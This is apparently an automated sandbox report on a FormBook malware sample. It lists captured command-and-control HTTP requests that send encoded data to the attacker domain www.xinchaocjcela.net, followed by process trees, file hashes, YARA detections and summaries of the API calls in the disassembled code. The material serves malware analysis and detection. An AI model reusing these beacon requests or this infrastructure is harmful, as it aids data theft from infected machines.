vlKLavJp=qNsoByDCrx2yQD0/WA6+odUeG9HNigW89VklFNUB0bH/yAWSyuBM4xoP1iHfO3L6uBJc8/+9sohw1PHpI3i2PImNid71ILYtH/rqnWOHmgRzypuyYLNhT+GiEULUPhpTit3OmzR5BQDg+QVX4bq5WfU4ZuiZzDiipuP//KGbBW0ozBXI8A+RpXQZd6lBYmPu6UuvRvdwVd4HwAHzW6AZ6dK/IkgQoFRECL/3KGmgzrouM0Rji0ZfYQcpIm8Y/AmBCiO1eB/tJZ2FCkVq5BKDjE5iPaS9iTGVYZ8vzIgju4NBZTpARMadvavTH5jH2DK1odkZFFQr/LAaEsX0LSuXXU08yJJsjmyt0QyfUcl6HOrkWC2s2VrLRwQLldJagYbnrTaJRw8MEZONmdsF1fz3/4KVMwNHOAl+tLHZ5nBzqq/upvpBgnp5t8NAagqAlBj5WKakUdAdavVTl0lY1lX96DuPjYSjpdNY9yVgJzjy0G5o7VIom79QZP3MDY3I3k/E54EZeaRoBcGf859MSAv7SI2GimT0AgN/ijlGGsCJyAFVDwUmZvqIjrxfFL4nCdzKqYU2igaWdad/ydepYim6+bBLEIBqgSY5npmuYJeU7COZhUXY0PDe3uF8D319a6uEK+uF9gVywYE/NZeGtHRC54zSsYFVfKjz/R+QwdF0p3En+yDrXI5oCSLgeImEBmFTY2P+/0s3JVTVnQlpgY8gxcnYO4bm01B31TeDlrRyKivfjUhTYcQC9gqfF233DFLolJ4BQ18DOlr4KzCV+ueqTerqP5RvnTvhFYbVGHHkPxvrs6A7sNdw1uwQpOIylmS3dq907whP9KDV9h/XOKjG7KRUCVR9pbVCVtxusqQ/QTdyCkVLbz82bMzm/IHlwkfuOEmwHzgsKxmR+psifa1pJVuu8PhC1g9qO/hzkIhdBIyn3gEJyPXPfDnTgtqQS76LHWXvYw0/HF8+tB1v89vK4Y28t07idwiiwiSWsNCfAPc [TRUNCATED]
Jan 10, 2025 18:38:49.490133047 CET	732	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 17:38:49 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=; path=/; domain=.www.xinchaocjcela.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax; Set-Cookie: btst=; path=/; domain=www.xinchaocjcela.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax; Set-Cookie: btst=ff6dacaa734d10ee5768efa0c7bf8025\|8.46.123.189\|1736530729\|1736530729\|0\|1\|0; path=/; domain=.xinchaocjcela.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Content-Encoding: gzip Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49983	18.143.155.63	80	6948	C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:38:50.636682987 CET	388	OUT	GET /uw0r/?vlKLavJp=nPEICG3NmX6YdDAbYweJ2KwuWMLPhUb+/mQ5fssM2K6c4DyCydhY6SRwuUq/IGDqoRtq++LuhfQJ86PpNRqRMbOt/OPSf4dzGL/I4GGe8jtT/v+mCQ==&oLbh=Z4SLXZCPeLcly HTTP/1.1 Host: www.xinchaocjcela.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0
Jan 10, 2025 18:38:52.040771008 CET	682	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 17:38:51 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=; path=/; domain=.www.xinchaocjcela.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax; Set-Cookie: btst=; path=/; domain=www.xinchaocjcela.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax; Set-Cookie: btst=94eb77bc55daeafc78037827d1a3f6b6\|8.46.123.189\|1736530731\|1736530731\|0\|1\|0; path=/; domain=.xinchaocjcela.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	12:36:51
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\FG5wHs4fVX.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FG5wHs4fVX.exe"
Imagebase:	0x760000
File size:	1'267'712 bytes
MD5 hash:	DAB4B7EFB8BDD226845A3FFD88FC6FA4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:36:53
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FG5wHs4fVX.exe"
Imagebase:	0xe40000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2028436007.0000000000320000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2029304266.0000000003120000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2029367705.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:37:47
Start date:	10/01/2025
Path:	C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe"
Imagebase:	0xd00000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2634969008.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	12:37:49
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\mtstocom.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\mtstocom.exe"
Imagebase:	0xd50000
File size:	113'152 bytes
MD5 hash:	5930C59472F42B5F237500C999727441
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2633551510.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2633503948.0000000003180000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2633311289.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	12:38:02
Start date:	10/01/2025
Path:	C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe"
Imagebase:	0xd00000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2634275836.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	12:38:15
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff73feb0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	1.8%
Signature Coverage:	3.3%
Total number of Nodes:	1882
Total number of Limit Nodes:	49

Executed Functions

Function 007642DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0076430D

Part of subcall function 00766B57: _wcslen.LIBCMT ref: 00766B6A

GetCurrentProcess.KERNEL32(?,007FCB64,00000000,?,?), ref: 00764422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00764429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00764454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00764466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00764474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0076447B
GetSystemInfo.KERNEL32(?,?,?), ref: 007644A0

Strings

GetNativeSystemInfo, xrefs: 00764460
kernel32.dll, xrefs: 0076444F
|O, xrefs: 007A36F8

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 3676bbf0ed9b9707039f492fbca73ce6644d2d019295788da35923f1ab08daab
Instruction ID: b74235ab8ddaf28661b04ad77ea95d4b646840f464257899253f72de28ce110a
Opcode Fuzzy Hash: 3676bbf0ed9b9707039f492fbca73ce6644d2d019295788da35923f1ab08daab
Instruction Fuzzy Hash: 81A1A66290A2C4DFCF12CB797C8D5E67FA47BE6F40B189D99E44293B22D67C4508CB21

Function 007642A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,007650AA,?,?,00000000,00000000), ref: 007642B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007650AA,?,?,00000000,00000000), ref: 007642C9
LoadResource.KERNEL32(?,00000000,?,?,007650AA,?,?,00000000,00000000,?,?,?,?,?,?,00764F20), ref: 007A35BE
SizeofResource.KERNEL32(?,00000000,?,?,007650AA,?,?,00000000,00000000,?,?,?,?,?,?,00764F20), ref: 007A35D3
LockResource.KERNEL32(007650AA,?,?,007650AA,?,?,00000000,00000000,?,?,?,?,?,?,00764F20,?), ref: 007A35E6

Strings

SCRIPT, xrefs: 007642BF

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: bd532494d17e0baae516c06e66b6ae05f5e851f01c368d89f7d59d335b52e5a1
Instruction ID: 9b6ba0b5d174f9129b24e8bcd9fa4713b8bad3e6a7da9ed9e28a873302b54355
Opcode Fuzzy Hash: bd532494d17e0baae516c06e66b6ae05f5e851f01c368d89f7d59d335b52e5a1
Instruction Fuzzy Hash: C3115771200604AFEB228BA9DD59F277BB9FBC5B51F208169F802962A0DB75D810DA20

Function 007A2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00762B6B

Part of subcall function 00763A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00831418,?,00762E7F,?,?,?,00000000), ref: 00763A78

Part of subcall function 00769CB3: _wcslen.LIBCMT ref: 00769CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00822224), ref: 007A2C10
ShellExecuteW.SHELL32(00000000,?,?,00822224), ref: 007A2C17

Strings

runas, xrefs: 007A2C0B

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: a4bc66e7a920ec89024133c30dff9a394f48cf1e4a9b9f9fe75010280bdbab62
Instruction ID: 42b4a409faf6e061ee67142d71f508f9f0cdb3c664e1ed6e806c99098dee4338
Opcode Fuzzy Hash: a4bc66e7a920ec89024133c30dff9a394f48cf1e4a9b9f9fe75010280bdbab62
Instruction Fuzzy Hash: A011D271208245EACB04FF60E8599BEBBA9EBD1700F44042DF987531A3DF3C894AD762

Function 007CDBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,007A5222), ref: 007CDBCE
GetFileAttributesW.KERNELBASE(?), ref: 007CDBDD
FindFirstFileW.KERNELBASE(?,?), ref: 007CDBEE
FindClose.KERNEL32(00000000), ref: 007CDBFA

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 5e393d91c126c96d88a350537bb9b9523d1eb1c1c0594add5be0e90618eda807
Instruction ID: d180d16b52f42616a8c53f537658f1c07964703a50056e479e6335cdc7ac43ed
Opcode Fuzzy Hash: 5e393d91c126c96d88a350537bb9b9523d1eb1c1c0594add5be0e90618eda807
Instruction Fuzzy Hash: F8F0A0308109185B92316B7CAE0D9BA376CAE01334F10871AF836C20E0EBB86D54C6A9

Function 0076D730 Relevance: 21.6, APIs: 14, Instructions: 631sleepsynchronizationtimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0076D807
timeGetTime.WINMM ref: 0076DA07
Sleep.KERNEL32(0000000A), ref: 0076DBB1
Sleep.KERNEL32(0000000A), ref: 007B2B76
GetExitCodeProcess.KERNEL32(?,?), ref: 007B2C11
WaitForSingleObject.KERNEL32(?,00000000), ref: 007B2C29
CloseHandle.KERNEL32(?), ref: 007B2C3D
Sleep.KERNEL32(?,CCCCCCCC,00000000), ref: 007B2CA9

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Sleep$CloseCodeExitHandleInputObjectProcessSingleStateTimeWaittime
String ID:
API String ID: 388478766-0
Opcode ID: e1202fad2a67e5ff3f5c154f464b5f8b87bf207822e615481e81303d42f1aa58
Instruction ID: 60212c234f3809ca08dcae3a68127f1d35754b2b7b9052712a2f901266f88d76
Opcode Fuzzy Hash: e1202fad2a67e5ff3f5c154f464b5f8b87bf207822e615481e81303d42f1aa58
Instruction Fuzzy Hash: 0142E170B18341DFD739CF24C858BAAB7A0FF85304F548959E85A87292D778EC45CB92

Function 00762CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00762D07
RegisterClassExW.USER32(00000030), ref: 00762D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00762D42
InitCommonControlsEx.COMCTL32(?), ref: 00762D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00762D6F
LoadIconW.USER32(000000A9), ref: 00762D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00762D94

Strings

+, xrefs: 00762CF0
AutoIt v3 GUI, xrefs: 00762D23
TaskbarCreated, xrefs: 00762D37
0, xrefs: 00762CE9

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 3c60790e56e88ed08bcee7bc8654c7b68cf0c319dd6f5cd7f7ae3aad47c58ff2
Instruction ID: dbdc109b11adce856692788660580050893e2cc4278b9e9fc6cb0991e221db00
Opcode Fuzzy Hash: 3c60790e56e88ed08bcee7bc8654c7b68cf0c319dd6f5cd7f7ae3aad47c58ff2
Instruction Fuzzy Hash: 8421B2B590121CAFDF01DFA4ED49BEDBBB4FB48B00F00851AEA11A62A0D7B95544CFA5

Function 007A065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007A039A: CreateFileW.KERNELBASE(00000000,00000000,?,007A0704,?,?,00000000,?,007A0704,00000000,0000000C), ref: 007A03B7

GetLastError.KERNEL32 ref: 007A076F
__dosmaperr.LIBCMT ref: 007A0776
GetFileType.KERNELBASE(00000000), ref: 007A0782
GetLastError.KERNEL32 ref: 007A078C
__dosmaperr.LIBCMT ref: 007A0795
CloseHandle.KERNEL32(00000000), ref: 007A07B5
CloseHandle.KERNEL32(?), ref: 007A08FF
GetLastError.KERNEL32 ref: 007A0931
__dosmaperr.LIBCMT ref: 007A0938

Strings

H, xrefs: 007A08BD

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 964f6ac7b2ddb99e2701686fd7a79da8a6daa6b28968e4eb7cde5fe34c8cfdd9
Instruction ID: d299999c551613b00eb28a0ad4db8ef2188fbb7d59709df9856cdc852027dff7
Opcode Fuzzy Hash: 964f6ac7b2ddb99e2701686fd7a79da8a6daa6b28968e4eb7cde5fe34c8cfdd9
Instruction Fuzzy Hash: 18A12332A001088FDF19AF68D855BAE7BA0AB87324F14465DF815DB2D1DB399D12CBD1

Function 0076344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00763A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00831418,?,00762E7F,?,?,?,00000000), ref: 00763A78

Part of subcall function 00763357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00763379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0076356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 007A318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007A31CE
RegCloseKey.ADVAPI32(?), ref: 007A3210
_wcslen.LIBCMT ref: 007A3277
_wcslen.LIBCMT ref: 007A3286

Strings

Include, xrefs: 007A3184, 007A31C5
Software\AutoIt v3\AutoIt, xrefs: 00763560
\Include\, xrefs: 00763527
\, xrefs: 007A328C

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 1d3dc776d530edae4ac15757ef7cd1649b95b50b4126d2a1bd497c168732a74c
Instruction ID: f602a3e351d6e1ebc85431f4c4aae0061c7a006149f8a1d9e12b43e2502630d3
Opcode Fuzzy Hash: 1d3dc776d530edae4ac15757ef7cd1649b95b50b4126d2a1bd497c168732a74c
Instruction Fuzzy Hash: 0C717B71404305AEC314EF65EC859ABBBE8FFC5750F50492EF546932B0EB789A48CB62

Function 00762B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00762B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00762B9D
LoadIconW.USER32(00000063), ref: 00762BB3
LoadIconW.USER32(000000A4), ref: 00762BC5
LoadIconW.USER32(000000A2), ref: 00762BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00762BEF
RegisterClassExW.USER32(?), ref: 00762C40

Part of subcall function 00762CD4: GetSysColorBrush.USER32(0000000F), ref: 00762D07
Part of subcall function 00762CD4: RegisterClassExW.USER32(00000030), ref: 00762D31
Part of subcall function 00762CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00762D42
Part of subcall function 00762CD4: InitCommonControlsEx.COMCTL32(?), ref: 00762D5F
Part of subcall function 00762CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00762D6F
Part of subcall function 00762CD4: LoadIconW.USER32(000000A9), ref: 00762D85
Part of subcall function 00762CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00762D94

Strings

AutoIt v3, xrefs: 00762C2F
0, xrefs: 00762C0F
#, xrefs: 00762C16

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 31bd7f3342e6c23aa9a6dfe6cbe416e2b7d059414dbbe1bb7adeab01e29811ab
Instruction ID: 6e3fcbb45fff5e06fd2a3238d952bf31eddd1cda86ca4cd5a040d2e5192c02d4
Opcode Fuzzy Hash: 31bd7f3342e6c23aa9a6dfe6cbe416e2b7d059414dbbe1bb7adeab01e29811ab
Instruction Fuzzy Hash: 74214C71E00318ABDF119FA6ED49AA97FB4FB88F50F00442AE500A67A0D3B91540DFA4

Function 00763170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0076316A,?,?), ref: 007631D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0076316A,?,?), ref: 00763204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00763227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0076316A,?,?), ref: 00763232
CreatePopupMenu.USER32 ref: 00763246
PostQuitMessage.USER32(00000000), ref: 00763267

Strings

TaskbarCreated, xrefs: 0076322D

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
